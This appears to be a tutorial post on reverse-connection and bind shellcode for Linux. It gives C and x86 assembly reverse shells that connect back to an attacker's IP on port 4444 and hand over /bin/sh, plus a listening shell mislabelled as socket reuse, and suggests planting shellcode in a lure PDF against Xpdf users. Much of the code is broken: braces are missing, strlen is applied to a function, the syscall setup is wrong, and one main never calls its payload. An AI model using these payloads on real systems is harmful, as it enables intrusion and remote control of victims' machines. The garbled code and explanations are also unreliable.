Reverse Connection Shellcode
reverse connection shellcode

Reverse Connection Shellcode

Reverse connection shellcode makes a connection from a hacked system to a different system where it can be caught using network tools such as netcat. Once the shellcode is connected, it spawns an interactive shell. The fact that the shellcode connects from the hacked machine makes it useful for trying to exploit vulnerabilities in a server behind a firewall. This kind of shellcode can also be used for vulnerabilities that cannot be directly exploited. For example, a buffer overflow vulnerability has been found in Xpdf, a PDF displayer for UNIX-based systems.

While the vulnerability is interesting, exploiting it on remote systems is hard because we cannot force someone to read a specially crafted .pdf file that exploits the leak. One possibility for exploiting this issue is to create a .pdf file that draws the attention of potentially affected UNIX users. Within this .pdf file, we could embed shellcode that connects over the Internet to our machine, from which we could control the hacked systems.

Reverse connection shellcode in C. The concept of constructing a shellcode payload that establishes a reverse TCP connection to a specified IP address and port.

#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

void reverse_shell(char *ip, int port) {
    int sockfd;
    struct sockaddr_in server_addr;

    // Create socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");

    // Set up server address
    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &server_addr.sin_addr) <= 0) {
        perror("Invalid address/ Address not supported");

    // Connect to server
    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Connection failed");

    // Redirect stdin, stdout, and stderr to the socket
    dup2(sockfd, 0);  // stdin
    dup2(sockfd, 1);  // stdout
    dup2(sockfd, 2);  // stderr

    // Execute shell
    execve("/bin/sh", NULL, NULL);

int main() {
    char ip[] = "";  // Replace with your attacker's IP address
    int port = 4444;             // Replace with your chosen port number

    printf("Reverse Shellcode Length: %lu\n", strlen((char *)reverse_shell));

    // Execute the reverse shellcode
    reverse_shell(ip, port);

    return 0;


  • The reverse_shell function creates a TCP socket, connects to the specified IP address and port, and redirects stdin, stdout, and stderr to the socket before executing /bin/sh.
  • The main function defines the IP address and port for the reverse connection, prints the length of the reverse shellcode, and then executes the reverse_shell function.

To compile and run this code, use a C compiler like GCC:

gcc -o reverse_shell reverse_shell.c        

Replace "" with your attacker's IP address and 4444 with your chosen port number. Note that this code assumes you have control over both the attacker machine (with a listener on the specified port) and the target machine where you execute the shellcode.

Reverse connection shellcode in assembly language (x86 NASM syntax). This shellcode establishes a reverse TCP connection to a specified IP address and port.

section .text
    global _start

    ; Create socket
    xor eax, eax                ; Clear EAX
    mov al, 0x66                ; Socket syscall number (sys_socketcall)
    xor ebx, ebx                ; Clear EBX
    inc ebx                     ; EBX = 1 (socketcall: SYS_SOCKET)
    xor ecx, ecx                ; Clear ECX
    mov cl, 0x2                 ; Protocol = IPPROTO_IP (IP protocol)
    xor edx, edx                ; Clear EDX
    push edx                    ; Clear EDX (padding)
    push ecx                    ; Push IPPROTO_IP (2) onto stack
    push ebx                    ; Push SYS_SOCKET (1) onto stack
    mov ecx, esp                ; Set ECX to point to syscall arguments
    int 0x80                    ; Call syscall

    ; Connect to server
    mov edi, eax                ; Save socket file descriptor
    xor eax, eax                ; Clear EAX
    mov al, 0x66                ; Socket syscall number (sys_socketcall)
    xor ebx, ebx                ; Clear EBX
    mov bl, 0x3                 ; SYS_CONNECT
    mov ecx, esp                ; Set ECX to point to syscall arguments
    xor edx, edx                ; Clear EDX
    mov dx, 0x5c11              ; Port number in little-endian format (4444)
    push edx                    ; Push port number onto stack
    mov edx, 0x0a0a8c0b         ; IP address in little-endian format (
    push edx                    ; Push IP address onto stack
    push word 0x2               ; AF_INET (2)
    mov ecx, esp                ; Set ECX to point to sockaddr structure
    int 0x80                    ; Call syscall

    ; Redirect stdin, stdout, and stderr to socket
    xor eax, eax                ; Clear EAX
    xor ebx, ebx                ; Clear EBX
    xor ecx, ecx                ; Clear ECX
    mov al, 0x3f                ; SYS_DUP2
    mov bl, 0x2                 ; FD 2 (stderr)
    int 0x80                    ; Call syscall
    mov al, 0x3f                ; SYS_DUP2
    mov bl, 0x1                 ; FD 1 (stdout)
    int 0x80                    ; Call syscall
    mov al, 0x3f                ; SYS_DUP2
    mov bl, 0x0                 ; FD 0 (stdin)
    int 0x80                    ; Call syscall

    ; Execute shell
    xor eax, eax                ; Clear EAX
    mov al, 0x0b                ; execve syscall number
    xor ebx, ebx                ; Clear EBX
    push ebx                    ; Push null terminator for argv
    push dword 0x68732f2f       ; Push "hs//" in little-endian format (//sh)
    push dword 0x6e69622f       ; Push "nib/" in little-endian format (/bin)
    mov ebx, esp                ; Set EBX to point to command string
    xor ecx, ecx                ; Clear ECX
    mov edx, ecx                ; Clear EDX
    int 0x80                    ; Call execve syscall

section .data
    ; IP address and port in little-endian format
    ip_addr     db 0x0b, 0x0a, 0x8c, 0x0a  ;
    port        dw 0x5c11                  ; Port 4444        


  • The shellcode first creates a socket using the socket syscall (SYS_SOCKET, protocol IPPROTO_IP) and then connects to the specified IP address and port using the connect syscall (SYS_CONNECT).
  • After establishing the connection, it redirects stdin, stdout, and stderr to the socket using the dup2 syscall (SYS_DUP2) and then executes /bin/sh using the execve syscall.

Note: Replace the IP address (0x0a0a8c0b) and port number (0x5c11) in the ip_addr and port variables with your actual IP address and port.

To compile this assembly code, you can use NASM and LD:

nasm -f elf32 -o reverse_shell.o reverse_shell.asm        
ld -m elf_i386 -o reverse_shell reverse_shell.o        

Then you can run the reverse_shell executable to execute the reverse connection shellcode.

Socket Reusing Shellcode

Port-binding shellcode is useful for some remote vulnerabilities, but is often too large and inefficient. This is especially true when exploiting a remote vulnerability where we have to make a connection. With socket reusing shellcode, this connection can be reused, which saves a lot of code and increases the chance that our exploit will work.

Socket reusing shellcode in C. Shellcode creates a socket, binds it to a port, and then listens for incoming connections. When a connection is established, it duplicates the socket file descriptor and redirects stdin, stdout, and stderr to the socket.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

void reuse_socket(int port) {
    int sockfd, clientfd;
    struct sockaddr_in server_addr, client_addr;
    socklen_t client_len;

    // Create socket
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");

    // Set up server address
    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = INADDR_ANY;
    server_addr.sin_port = htons(port);

    // Bind socket to port
    if (bind(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Bind failed");

    // Listen for incoming connections
    if (listen(sockfd, 5) < 0) {
        perror("Listen failed");

    // Accept incoming connection
    client_len = sizeof(client_addr);
    clientfd = accept(sockfd, (struct sockaddr *)&client_addr, &client_len);
    if (clientfd < 0) {
        perror("Accept failed");

    // Redirect stdin, stdout, and stderr to the socket
    dup2(clientfd, 0);  // stdin
    dup2(clientfd, 1);  // stdout
    dup2(clientfd, 2);  // stderr

    // Execute shell
    execve("/bin/sh", NULL, NULL);

int main() {
    int port = 4444;  // Replace with your chosen port number

    printf("Socket Reuse Shellcode Length: %lu\n", strlen((char *)reuse_socket));

    // Execute the socket reuse shellcode

    return 0;


  • The reuse_socket function creates a socket, binds it to the specified port, listens for incoming connections, and accepts a connection.
  • After accepting the connection, it duplicates the socket file descriptor and redirects stdin, stdout, and stderr to the socket before executing /bin/sh to spawn a shell.
  • The main function defines the port for the socket reuse operation, prints the length of the shellcode, and then executes the reuse_socket function.

To compile and run this code, use a C compiler like GCC:

gcc -o socket_reuse socket_reuse.c        

Replace 4444 in the port variable with your chosen port number. Note that this code assumes you have control over both the attacker machine (with a listener on the specified port) and the target machine where you execute the shellcode.

Abdul Wahab Junaid


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